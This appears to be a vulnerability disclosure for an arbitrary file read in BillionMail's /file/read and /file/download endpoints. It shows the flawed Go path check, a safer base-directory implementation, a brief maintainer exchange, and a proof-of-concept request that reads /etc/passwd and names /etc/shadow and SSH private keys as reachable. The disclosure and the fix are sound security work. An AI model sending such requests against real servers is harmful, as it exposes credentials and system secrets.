Vulnerability: Arbitrary File Read in BillionMail
The BillionMail application exposes an arbitrary file read vulnerability via the /file/read and /file/download endpoints. An authenticated attacker can supply arbitrary absolute file paths and retrieve the contents of files from the server’s filesystem.
This leads to disclosure of sensitive files such as /etc/passwd, private keys, application configs, and database credentials.
Affected Endpoints
GET /file/read
GET /file/download
Both require an Authorization header but insufficiently validate the file_path parameter.
Technical Details
Vulnerable code
The validation function only blocks `./` sequences and the exact string `/`:
```go
// Vulnerable version as reported: a substring check for "./" and an equality
// check for "/" are the only filters applied to the user-controlled path.
func (c *ControllerV1) validateFilePath(filePath string) error {
	if filePath == "/" {
		return gerror.New("Cannot use system root directory")
	}
	if strings.Contains(filePath, "./") {
		return gerror.New("Invalid path parameter")
	}
	// Any other absolute path, e.g. /etc/passwd, passes through unchanged.
	return nil
}
```
This still allows absolute paths such as /etc/passwd.
The handler then calls:
```go
os.ReadFile(filePath)
```
without enforcing a safe base directory.
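One way to enforce a base directory for such a read handler, written here as an added example rather than code from the BillionMail project: every request is resolved against an operator-chosen directory (assumed absolute, e.g. `/srv/mail/files`), absolute and traversing paths are refused on the cleaned path rather than by substring matching, and symlinks are resolved before the final containment check.

```go
package main

import (
	"errors"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideBase covers any request that does not resolve inside the base directory.
var ErrOutsideBase = errors.New("path is outside the allowed directory")

// insideBase reports whether cleaned absolute path abs lies within baseDir; after cleaning, an escape can only appear as a leading ".." segment.
func insideBase(baseDir, abs string) bool {
	rel, err := filepath.Rel(baseDir, abs)
	if err != nil {
		return false
	}
	return rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

// resolveUnderBase maps a user-supplied relative path onto baseDir. Unlike a
// substring check for "./", it decides on the joined and cleaned path, so
// "../x", "sub/../../x" and absolute paths like "/etc/passwd" are all refused.
func resolveUnderBase(baseDir, userPath string) (string, error) {
	if filepath.IsAbs(userPath) {
		return "", ErrOutsideBase
	}
	candidate := filepath.Join(baseDir, userPath) // Join also cleans the result
	if !insideBase(baseDir, candidate) {
		return "", ErrOutsideBase
	}
	return candidate, nil
}

// readUnderBase replaces a bare os.ReadFile(filePath): it resolves symlinks on
// both sides and re-checks containment, so a link inside baseDir pointing at
// /etc cannot leave it. Missing files get the same error, so nothing is probed.
func readUnderBase(baseDir, userPath string) ([]byte, error) {
	candidate, err := resolveUnderBase(baseDir, userPath)
	if err != nil {
		return nil, err
	}
	realBase, errB := filepath.EvalSymlinks(baseDir)
	realPath, errP := filepath.EvalSymlinks(candidate)
	if errB != nil || errP != nil || !insideBase(realBase, realPath) {
		return nil, ErrOutsideBase
	}
	return os.ReadFile(realPath)
}
```

The lexical check alone is not enough on a filesystem where users can create symlinks, which is why `readUnderBase` re-checks after `EvalSymlinks`.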
Proof of Concept (PoC)
Request:
```http
GET /file/read?file_path=/etc/passwd HTTP/1.1
Host: target.example.com
Authorization: Bearer <valid_token>
```
Response (truncated):
```json
{
  "success": true,
  "code": 0,
  "msg": "Success",
  "data": "root:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\n..."
}
```
This confirms full file disclosure.
Impact
- Disclosure of sensitive system files (/etc/passwd, /etc/shadow, /root/.ssh/id_rsa).
- Disclosure of application secrets and configuration files.
Which version are you using? I can't seem to reproduce it.
Test on the release version; it has been fixed in the dev branch.